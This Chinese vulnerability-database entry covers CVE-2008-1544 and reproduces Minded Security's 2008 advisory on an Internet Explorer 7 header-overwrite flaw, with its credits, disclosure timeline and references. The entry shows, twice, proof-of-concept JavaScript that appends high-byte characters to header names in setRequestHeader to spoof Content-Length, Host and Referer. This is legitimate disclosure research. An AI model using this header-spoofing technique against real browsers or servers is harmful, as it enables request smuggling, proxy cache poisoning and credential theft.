Microsoft IE 7 setRequestHeader()函数请求拆分漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1187219 漏洞类型 输入验证
发布时间 2008-03-21 更新时间 2008-06-18
CVE编号 CVE-2008-1544 CNNVD-ID CNNVD-200803-469
漏洞平台 N/A CVSS评分 7.1
|漏洞来源
https://www.securityfocus.com/bid/28379
https://cxsecurity.com/issue/WLB-2008030078
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200803-469
|漏洞详情
InternetExplorer是微软发布的非常流行的WEB浏览器。IE7允许通过HTTP请求拆分攻击覆盖Content-Length、Host和Referer等HTTP头,导致HTTP头信息欺骗。类似于以下javascript:----------------------------------------------varx=newXMLHttpRequest();x.open("POST","/");for(f=127;f<255;f++)try{x.setRequestHeader("Host"+String.fromCharCode(f),"Test");}catch(dd){}x.setRequestHeader("Connection","keep-alive");x.onreadystatechange=function(){if(x.readyState==4){}}x.send("blah");----------------------------------------------会覆盖以下头:-Content-Lengthx.setRequestHeader("Content-Length"+String.fromCharCode(201),"0");x.setRequestHeader("Content-Length"+String.fromCharCode(233),"0");x.setRequestHeader("Content-Length"+String.fromCharCode(240)+String.fromCharCode(213),"0");-Hostx.setRequestHeader("Host"+String.fromCharCode(223),"www.microsoft.com");-Refererx.setRequestHeader("Referer"+String.fromCharCode(205)+String.fromCharCode(155),"http://www.referrer.tld");x.setRequestHeader("Referer"+String.fromCharCode(237)+String.fromCharCode(155),"http://www.referrer.tld")
|漏洞EXP
MSA01240108:
IE7 allows overwriting of several headers leading to Http
request Splitting and smuggling.

Date: March 21th, 2008

Tested Versions: 
       Internet Explorer 7.0.5730.11

Tested OS:
       Windows XP Professional SP2 Italian

Minded Security ReferenceID:
        MSA02240108

Credits:
        Discovery by
        Stefano Di Paola of Minded Security
        stefano.dipaola [_at_] mindedsecurity.com

Permalink:
        http://www.mindedsecurity.com/MSA02240108.html

Severity: Medium/High

[ Summary ]

Internet Explorer 7 allows overwrite of headers such Content-Length,
Host and Referer, exposing the browser to Http Request Splitting.

[ Analysis ]

By trying the following javascript - or similar:

----------------------------------------------
var x=new XMLHttpRequest();

x.open("POST","/");
for(f=127;f<255;f++)
try{
 x.setRequestHeader("Host"+String.fromCharCode(f),"Test");
}catch(dd){}
x.setRequestHeader("Connection","keep-alive");
 x.onreadystatechange=function (){
    if (x.readyState == 4){
   }
 }
x.send("blah");
----------------------------------------------

Headers found to be overwritable are:

- Content-Length (one of the following):
   x.setRequestHeader("Content-Length"+String.fromCharCode(201),"0");
   
   x.setRequestHeader("Content-Length"+String.fromCharCode(233),"0");
   
   x.setRequestHeader("Content-Length"+String.fromCharCode(240)
   +String.fromCharCode(213),"0");

- Host (one of the following):

x.setRequestHeader("Host"+String.fromCharCode(223),
   "www.microsoft.com");

- Referer (one of the following):

x.setRequestHeader("Referer"+String.fromCharCode(205)+ 
   String.fromCharCode(155),"http://www.referrer.tld");

x.setRequestHeader("Referer"+String.fromCharCode(237)+
   String.fromCharCode(155),"http://www.referrer.tld");

Several combination of characters > 127 were found to work, this
means that the chars listed above are only a working subset.

The effects of those issues are quite understandable from a security
point of view (see references):
1. Proxy cache poisoning
2. Credential stealing
3. several other attacks..

My understanding about the issue is that there's some
ascii-to-utf-8 / utf-8-to-ascii error which leads to some kind of
bypass when checking header names against protected ones.

[ Credits ]

Stefano di Paola is credited with the discovery of this vulnerability.

[ Thanks ]

To Amit Klein for his valuable research.

[ Disclosure Timeline ]

25/01/2008  Initial vendor notification
25/01/2008  Vendor Confirmed
21/03/2008  Public advisory

[ Reference ]

[1] "Http Request Smuggling", Chaim Linhart, Amit Klein, Ronen
   Heled, Steve Orrin, 2005.
   http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf

[2] "Exploiting the XmlHttpRequest object in IE - Referrer spoofing,
   and a lot more...", Amit Klein, 2005.
   http://www.securityfocus.com/archive/1/411585

[3] "HTTP Header Injection Vulnerabilities in the Flash Player
   Plugin", 2006.
   http://download2.rapid7.com/r7-0026/

[4] "Auto Injecting Cross Domain Scripting", pp 6-7, Stefano Di Paola,
   Giorgio Fedon, 2007
   http://www.wisec.it/docs.php?id=4

[ Disclaimer ]

The information within this paper may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever 
arising out of or in connection with the use or spread of this 
information.
Any use of this information is at the user's own risk.

Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express
consent of Minded Security Research Lab. If you wish to reprint the
whole or any part of this Alert in any other medium excluding
electronic medium, please e-mail research_at_mindedsecurity.com 
for permission.

Copyright (c) 2008 Minded Security, S.r.l..

All rights reserved worldwide.

-- 
---
Research Labs
Minded Security S.r.l.

Web: http://www.mindedsecurity.com

Mail: research_at_mindedsecurity.com
|受影响的产品
Nortel Networks Contact Center NCC 0 Nortel Networks Contact Center Manager Server 0 Nortel Networks Contact Center Express Nortel Networks Contact Center Administration 0 Nortel Network
|参考资料

来源:US-CERT:TA08-162B
名称:TA08-162B
链接:http://www.us-cert.gov/cas/techalerts/TA08-162B.html
来源:BID
名称:28379
链接:http://www.securityfocus.com/bid/28379
来源:MS
名称:MS08-031;PatchInformation
链接:http://www.microsoft.com/technet/security/bulletin/ms08-031.mspx
来源:VUPEN
名称:ADV-2008-1778;PatchInformation
链接:http://www.frsirt.com/english/advisories/2008/1778
来源:VUPEN
名称:ADV-2008-0980;PatchInformation
链接:http://www.frsirt.com/english/advisories/2008/0980
来源:SECTRACK
名称:1020226
链接:http://www.securitytracker.com/id?1020226
来源:BUGTRAQ
名称:20080321[MSA02240108]IE7allowsoverwritingofseveralheadersleadingtoHttprequestSplittingandsmuggling.
链接:http://www.securityfocus.com/archive/1/archive/1/489954/100/0/threaded
来源:MISCl
链接:http://www.mindedsecurity.com/MSA02240108.html
来源:SREASON
名称:3785
链接:http://securityreason.com/securityalert/3785
来源:SECUNIA
名称:29453
链接:http://secunia.com/advisories/29453
来源:OVAL
名称:oval:org.mitre.oval:def:5291
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:de